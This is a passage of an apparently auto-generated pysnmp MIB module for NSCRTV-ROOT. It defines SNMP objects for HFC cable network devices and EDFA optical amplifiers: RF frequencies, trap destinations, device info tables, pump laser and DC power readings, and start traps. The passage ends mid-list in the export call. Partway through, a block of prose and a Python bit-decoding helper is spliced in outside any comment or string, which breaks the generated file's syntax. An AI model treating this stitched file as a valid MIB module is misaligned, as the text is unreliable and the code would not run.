commonReturnPathFrequency = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonReturnPathFrequency.setStatus('mandatory')
if mibBuilder.loadTexts: commonReturnPathFrequency.setDescription('Upstream channel frequency, in Hz. The value of this object should be stored in non-volatile memory.')
commonForwardPathFrequency = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonForwardPathFrequency.setStatus('mandatory')
if mibBuilder.loadTexts: commonForwardPathFrequency.setDescription('Downstream channel frequency, in Hz. The value of this object should be stored in non-volatile memory.')
commonProvisionedReturnPowerLevel = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 127))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonProvisionedReturnPowerLevel.setStatus('mandatory')
if mibBuilder.loadTexts: commonProvisionedReturnPowerLevel.setDescription('Provisioned upstream channel transmit power level, in dBuV. When used internally, this value is rounded to the nearest supported value. Reading this object returns the actual (rounded) value rather than the value written. The value of this object should be stored in non-volatile memory.')
commonForwardPathReceiveLevel = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonForwardPathReceiveLevel.setStatus('optional')
if mibBuilder.loadTexts: commonForwardPathReceiveLevel.setDescription('Downstream channel receive power level, in dBuV.')
commonMaxReturnPower = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 2, 2, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 127))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonMaxReturnPower.setStatus('mandatory')
if mibBuilder.loadTexts: commonMaxReturnPower.setDescription('Maximum upstream channel transmit power level, in dBuV. The value of this object should be stored in non-volatile memory.')
commonAgentBootWay = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("bootDefault", 1), ("bootBOOTP", 2), ("bootTFTP", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentBootWay.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentBootWay.setDescription('Agent boot method (default, BOOTP, or TFTP).')
commonAgentReset = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentReset.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentReset.setDescription("Agent restart. Writing '1' restarts the agent; writing any other value has no effect. Reading this object returns '1' and has no effect on the agent.")
commonAgentMaxTraps = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentMaxTraps.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentMaxTraps.setDescription('Maximum number of TRAPs the agent sends to the management station when an alarm is detected; 0 means the vendor default value is used.')
commonAgentTrapMinInterval = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 4), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapMinInterval.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapMinInterval.setDescription('Minimum interval between TRAPs sent by the agent, in seconds.')
commonAgentTrapMaxInterval = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapMaxInterval.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapMaxInterval.setDescription('Maximum interval between TRAPs sent by the agent, in seconds.')
commonTrapAck = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 6), OctetString().subtype(subtypeSpec=ValueSizeConstraint(17, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonTrapAck.setStatus('optional')
if mibBuilder.loadTexts: commonTrapAck.setDescription('This variable is used to notify the SNMP agent that the management station has received an alarm Trap, so the Trap need not be resent. The content of the variable is the same as the alarmLogInformation of the corresponding alarm in the MIB. From alarmLogInformation the agent can determine exactly which alarm Trap the management host is acknowledging, and stop resending that alarm Trap.')
commonAgentTrapTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7), )
if mibBuilder.loadTexts: commonAgentTrapTable.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapTable.setDescription('Agent TRAP destination table.')
commonAgentTrapEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1), ).setIndexNames((0, "NSCRTV-ROOT", "commonAgentTrapIndex"))
if mibBuilder.loadTexts: commonAgentTrapEntry.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapEntry.setDescription('An entry (row) in the agent TRAP destination table.')
commonAgentTrapIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonAgentTrapIndex.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapIndex.setDescription('TRAP Table Index.')
commonAgentTrapIP = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapIP.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapIP.setDescription('IP address of the TRAP destination host.')
commonAgentTrapCommunity = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapCommunity.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapCommunity.setDescription('Community string used when sending TRAPs.')
commonAgentTrapStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 1, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("commonAgentTrapEnable", 1), ("commonAgentTrapDisable", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonAgentTrapStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonAgentTrapStatus.setDescription('Indicates whether sending TRAPs to this destination is enabled.')
commonDeviceNum = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 1), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonDeviceNum.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceNum.setDescription('The number of devices currently managed by the agent.')
commonDeviceInfoTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2), )
if mibBuilder.loadTexts: commonDeviceInfoTable.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceInfoTable.setDescription('Table of common information for the devices currently managed by the agent.')
commonDeviceInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1), ).setIndexNames((0, "NSCRTV-ROOT", "commonDeviceSlot"))
if mibBuilder.loadTexts: commonDeviceInfoEntry.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceInfoEntry.setDescription('An entry (row) in the common device information table.')
commonDeviceSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceSlot.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceSlot.setDescription('Index of the common device information table: the slot of a device currently managed by the agent.')
commonDevicesID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 40))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDevicesID.setStatus('mandatory')
if mibBuilder.loadTexts: commonDevicesID.setDescription('Vendor-assigned device identifier.')
commonDeviceVendor = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceVendor.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceVendor.setDescription('Device vendor.')
commonDeviceModelNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceModelNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceModelNumber.setDescription('Equipment Model.')
commonDeviceSerialNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceSerialNumber.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceSerialNumber.setDescription('Device serial number string.')
commonDeviceVendorInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceVendorInfo.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceVendorInfo.setDescription('Other vendor-specific device information.')
commonDeviceStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceStatus.setDescription('Device status bits: Bit 0: RSVD0; Bit 1: RSVD1; Bit 2: RSVD2; Bit 3: MAJOR ALARMS; Bit 4: MINOR ALARMS; Bit 5: RSVD5; Bit 6: RSVD6; Bit 7: RSVD7.')
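The commonDeviceStatus octet above packs alarm flags into individual bits. A minimal decoding sketch (helper name and LSB-first bit numbering are assumptions, not part of the MIB):

```python
# Hypothetical decoder for the commonDeviceStatus bit layout described above.
# Assumes "Bit n" means bit n counted from the least significant bit.
STATUS_BITS = {3: "MAJOR ALARMS", 4: "MINOR ALARMS"}

def decode_device_status(octet: int):
    """Return the names of the alarm bits set in a status octet."""
    return [name for bit, name in STATUS_BITS.items() if octet & (1 << bit)]
```

For example, an octet with bits 3 and 4 set (value 24) decodes to both alarm names, while 0 decodes to an empty list.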
commonDeviceReset = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("reset", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonDeviceReset.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceReset.setDescription("Writing '1' resets the device; writing any other value has no effect. Reading this object returns '1' and has no effect on the device.")
commonDeviceAlarmDetectionControl = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("detectionDisabled", 1), ("detectionEnabled", 2), ("detectionEnabledAndRegenerate", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: commonDeviceAlarmDetectionControl.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceAlarmDetectionControl.setDescription('This object is used to control device alarm detection.')
commonDeviceMACAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 10), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceMACAddress.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceMACAddress.setDescription('Equipment MAC address.')
commonDeviceTamperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("intact", 1), ("compromised", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceTamperStatus.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceTamperStatus.setDescription("Reports the state of the device's safety switch (e.g. whether the case lid has been opened). This object is a discrete property with a corresponding entry in the discrete property table. 'intact' means normal; 'compromised' indicates an alarm.")
commonDeviceInternalTemperature = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-128, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceInternalTemperature.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceInternalTemperature.setDescription('Device internal (chassis) temperature, in degrees Celsius. This object is an analog property with a corresponding entry in the analog property table.')
commonDeviceResetCause = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("other", 1), ("powerup", 2), ("command", 3), ("watchdog", 4), ("craft", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceResetCause.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceResetCause.setDescription("Indicates the cause of the device's most recent reset.")
commonDeviceCraftStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("disconnected", 1), ("connected", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceCraftStatus.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceCraftStatus.setDescription("Indicates the state of the device's local craft interface (e.g. an RS232 or RS485 port).")
commonDevicesOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 15), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDevicesOID.setStatus('mandatory')
if mibBuilder.loadTexts: commonDevicesOID.setDescription('Object identifier pointing to the device-specific MIB implementation.')
commonDeviceAcct = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceAcct.setStatus('optional')
if mibBuilder.loadTexts: commonDeviceAcct.setDescription('Accumulated device operating time, in seconds.')
commonDeviceName = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 17), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceName.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceName.setDescription('Equipment Name.')
commonDeviceMFD = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 18), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(10, 10)).setFixedLength(10)).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceMFD.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceMFD.setDescription('Device manufacturing date.')
commonDeviceFW = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 3, 3, 2, 2, 1, 19), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: commonDeviceFW.setStatus('mandatory')
if mibBuilder.loadTexts: commonDeviceFW.setDescription('Device firmware information.')
hfcColdStart = NotificationType((1, 3, 6, 1, 4, 1, 17409, 1) + (0,0)).setObjects(("NSCRTV-ROOT", "commonPhysAddress"), ("NSCRTV-ROOT", "commonNELogicalID"))
if mibBuilder.loadTexts: hfcColdStart.setDescription("The hfcColdStart trap signifies that the sending protocol entity is re-initializing itself and that the agent's configuration or the protocol entity implementation may have changed. This trap is sent only after the transponder has registered successfully.")
hfcWarmStart = NotificationType((1, 3, 6, 1, 4, 1, 17409, 1) + (0,2)).setObjects(("NSCRTV-ROOT", "commonPhysAddress"), ("NSCRTV-ROOT", "commonNELogicalID"))
if mibBuilder.loadTexts: hfcWarmStart.setDescription("The hfcWarmStart trap signifies that the sending protocol entity is re-initializing itself, but neither the agent's configuration nor the protocol entity implementation has changed. This trap is sent only after the transponder has completed registration.")
oaVendorOID = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaVendorOID.setStatus('optional')
if mibBuilder.loadTexts: oaVendorOID.setDescription("This object provides the vendor's optical amplifier MIB extension. If no extension exists, it should point to the oaIdent node of the optical amplifier.")
oaOutputOpticalPower = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaOutputOpticalPower.setStatus('mandatory')
if mibBuilder.loadTexts: oaOutputOpticalPower.setDescription('Output optical power, in units of 0.1 dBm. This object is an analog property that requires a corresponding entry in the property table.')
oaInputOpticalPower = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-128, 127))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaInputOpticalPower.setStatus('mandatory')
if mibBuilder.loadTexts: oaInputOpticalPower.setDescription('Input optical power, in units of 0.1 dBm. This object is an analog property that requires a corresponding entry in the property table.')
oaPumpTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4), )
if mibBuilder.loadTexts: oaPumpTable.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpTable.setDescription('EDFA pump laser information table.')
oaPumpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1), ).setIndexNames((0, "NSCRTV-ROOT", "oaPumpIndex"))
if mibBuilder.loadTexts: oaPumpEntry.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpEntry.setDescription('An entry (row) in the pump laser information table, one per pump laser of the optical amplifier.')
oaPumpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpIndex.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpIndex.setDescription('Pump laser index.')
oaPumpBIAS = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpBIAS.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpBIAS.setDescription('Pump laser bias current, in mA. This object is an analog property that requires a corresponding entry in the property table.')
oaPumpTEC = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-32768, 32767))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpTEC.setStatus('optional')
if mibBuilder.loadTexts: oaPumpTEC.setDescription('Pump laser cooling (TEC) current, in units of 0.01 A. This object is an analog property that requires a corresponding entry in the property table.')
oaPumpTemp = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 4, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 32768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaPumpTemp.setStatus('mandatory')
if mibBuilder.loadTexts: oaPumpTemp.setDescription('Pump laser temperature, in units of 0.1 degrees Celsius. This object is an analog property that requires a corresponding entry in the property table.')
oaNumberDCPowerSupply = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaNumberDCPowerSupply.setStatus('mandatory')
if mibBuilder.loadTexts: oaNumberDCPowerSupply.setDescription('Number of internal DC power supplies; 0 indicates the transponder does not support this function.')
oaDCPowerSupplyMode = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("loadsharing", 1), ("switchedRedundant", 2), ("aloneSupply", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerSupplyMode.setStatus('optional')
if mibBuilder.loadTexts: oaDCPowerSupplyMode.setDescription('Power supply mode: load sharing, switched redundant (standby), or standalone supply.')
oaDCPowerTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7), )
if mibBuilder.loadTexts: oaDCPowerTable.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerTable.setDescription('DC Power Information Table.')
oaDCPowerEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1), ).setIndexNames((0, "NSCRTV-ROOT", "oaDCPowerIndex"))
if mibBuilder.loadTexts: oaDCPowerEntry.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerEntry.setDescription('An entry (row) in the DC power information table.')
oaDCPowerIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerIndex.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerIndex.setDescription('DC Power Index.')
oaDCPowerVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-32768, 32767))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerVoltage.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerVoltage.setDescription('Supply voltage, in units of 0.1 V. This object is an analog property that requires a corresponding entry in the property table.')
oaDCPowerCurrent = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerCurrent.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerCurrent.setDescription('Supply current, in units of 0.01 A. This object is an analog property that requires a corresponding entry in the property table.')
oaDCPowerName = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 11, 7, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: oaDCPowerName.setStatus('mandatory')
if mibBuilder.loadTexts: oaDCPowerName.setDescription("Name of the power supply, for example '24 V DC power supply'. The value is set by the user and should at least include the supply voltage and distinguish the supplies from each other. When an object in this table raises an alarm, this name should be placed in the alarmText object of the hfcAlarmEvent trap.")
oaOutputOpticalPowerSet = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: oaOutputOpticalPowerSet.setStatus('mandatory')
if mibBuilder.loadTexts: oaOutputOpticalPowerSet.setDescription('Output optical power setpoint, in units of 0.1 dBm.')
oaGainSet = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 12), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: oaGainSet.setStatus('mandatory')
if mibBuilder.loadTexts: oaGainSet.setDescription('Gain setpoint, in units of 0.1 dB.')
powerSupplyStatusA = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 32), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("undefined", 0), ("nominal", 1), ("failure", 2), ("notInstalled", 3)))).setUnits('no units').setMaxAccess("readonly")
if mibBuilder.loadTexts: powerSupplyStatusA.setStatus('current')
if mibBuilder.loadTexts: powerSupplyStatusA.setDescription('Returns the operating status of power supply A.')
powerSupplyStatusB = MibScalar((1, 3, 6, 1, 4, 1, 17409, 1, 11, 33), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3))).clone(namedValues=NamedValues(("undefined", 0), ("nominal", 1), ("failure", 2), ("notInstalled", 3)))).setUnits('no units').setMaxAccess("readonly")
if mibBuilder.loadTexts: powerSupplyStatusB.setStatus('current')
if mibBuilder.loadTexts: powerSupplyStatusB.setDescription('Returns the operating status of power supply B.')
mibBuilder.exportSymbols("NSCRTV-ROOT", commonRfGroup=commonRfGroup, oaPumpTable=oaPumpTable, oaDCPowerSupplyMode=oaDCPowerSupplyMode, hfcWarmStart=hfcWarmStart, commonAgentMaxTraps=commonAgentMaxTraps, commonReturnPathFrequency=commonReturnPathFrequency, commonAgentTrapIndex=commonAgentTrapIndex, commonDeviceInfoTable=commonDeviceInfoTable, commonAgentTrapStatus=commonAgentTrapStatus, oaDCPowerTable=oaDCPowerTable, discreteAlarmEnable=discreteAlarmEnable, commonBackwardPathCollisionTimes=commonBackwardPathCollisionTimes, commonNELogicalID=commonNELogicalID, commonForwardPathFramingErrors=commonForwardPathFramingErrors, alarmLogNumberOfEntries=alarmLogNumberOfEntries, oaInputOpticalPower=oaInputOpticalPower, analogPropertyEntry=analogPropertyEntry, oaPumpIndex=oaPumpIndex, commonDeviceMACAddress=commonDeviceMACAddress, commonForwardPathLOSEvents=commonForwardPathLOSEvents, commonDeviceInternalTemperature=commonDeviceInternalTemperature, oaPumpTemp=oaPumpTemp, commonACKTimeoutWindow=commonACKTimeoutWindow, commonAgentTrapEntry=commonAgentTrapEntry, currentAlarmOID=currentAlarmOID, commonDeviceCraftStatus=commonDeviceCraftStatus, commonDeviceName=commonDeviceName, commonIdent=commonIdent, commonResetCause=commonResetCause, analogPropertyTable=analogPropertyTable, commonMulticastAddressEntry=commonMulticastAddressEntry, commonDevicesOID=commonDevicesOID, oaDCPowerEntry=oaDCPowerEntry, commonDeviceStatus=commonDeviceStatus, currentAlarmValue=currentAlarmValue, commonAgentTrapMinInterval=commonAgentTrapMinInterval, nscrtvHFCemsTree=nscrtvHFCemsTree, alarmLogTable=alarmLogTable, hfcColdStart=hfcColdStart, commonNEVendorInfo=commonNEVendorInfo, oaOutputOpticalPowerSet=oaOutputOpticalPowerSet, oaOutputOpticalPower=oaOutputOpticalPower, commonDeviceAcct=commonDeviceAcct, commonMulticastAddressNumber=commonMulticastAddressNumber, commonAgentGroup=commonAgentGroup, currentAlarmTable=currentAlarmTable, oaDCPowerCurrent=oaDCPowerCurrent, 
commonDeviceInfoEntry=commonDeviceInfoEntry, discreteAlarmValue=discreteAlarmValue, commonVarBindings=commonVarBindings, commonMacStats=commonMacStats, discreteParameterOID=discreteParameterOID, commonForwardPathFrequency=commonForwardPathFrequency, commonDeviceSerialNumber=commonDeviceSerialNumber, commonAgentReset=commonAgentReset, commonAgentTrapMaxInterval=commonAgentTrapMaxInterval, commonDeviceGroup=commonDeviceGroup, propertyIdent=propertyIdent, nscrtvRoot=nscrtvRoot, commonMACGroup=commonMACGroup, commonDeviceMFD=commonDeviceMFD, commonNetworkAddress=commonNetworkAddress, oaPumpTEC=oaPumpTEC, commonMaxPayloadSize=commonMaxPayloadSize, powerSupplyStatusB=powerSupplyStatusB, hfcAlarmEvent=hfcAlarmEvent, powerSupplyStatusA=powerSupplyStatusA, discreteAlarmState=discreteAlarmState, commonBackoffMaximumExponent=commonBackoffMaximumExponent, analogAlarmState=analogAlarmState, analogAlarmHIHI=analogAlarmHIHI, currentAlarmEntry=currentAlarmEntry, alarmLogEntry=alarmLogEntry, commonBackoffParams=commonBackoffParams, oaPumpEntry=oaPumpEntry, commonDeviceModelNumber=commonDeviceModelNumber, commonForwardPathReceiveLevel=commonForwardPathReceiveLevel, commonDeviceSlot=commonDeviceSlot, analogAlarmLO=analogAlarmLO, oaGainSet=oaGainSet, commonTime=commonTime, alarmsIdent=alarmsIdent, commonNEModelNumber=commonNEModelNumber, commonMaximumMACLayerRetries=commonMaximumMACLayerRetries, commonAgentTrapIP=commonAgentTrapIP, commonBackoffPeriod=commonBackoffPeriod, commonPhysAddress=commonPhysAddress, commonMaxMulticastAddresses=commonMaxMulticastAddresses, commonDeviceAlarmDetectionControl=commonDeviceAlarmDetectionControl, commonDeviceVendorInfo=commonDeviceVendorInfo, commonAdminUseRf=commonAdminUseRf, commonAdminGroup=commonAdminGroup, alarmEnable=alarmEnable, commonCheckCode=commonCheckCode, commonNEVendor=commonNEVendor, commonMaxReturnPower=commonMaxReturnPower, commonAgentTrapCommunity=commonAgentTrapCommunity, oaDCPowerIndex=oaDCPowerIndex, 
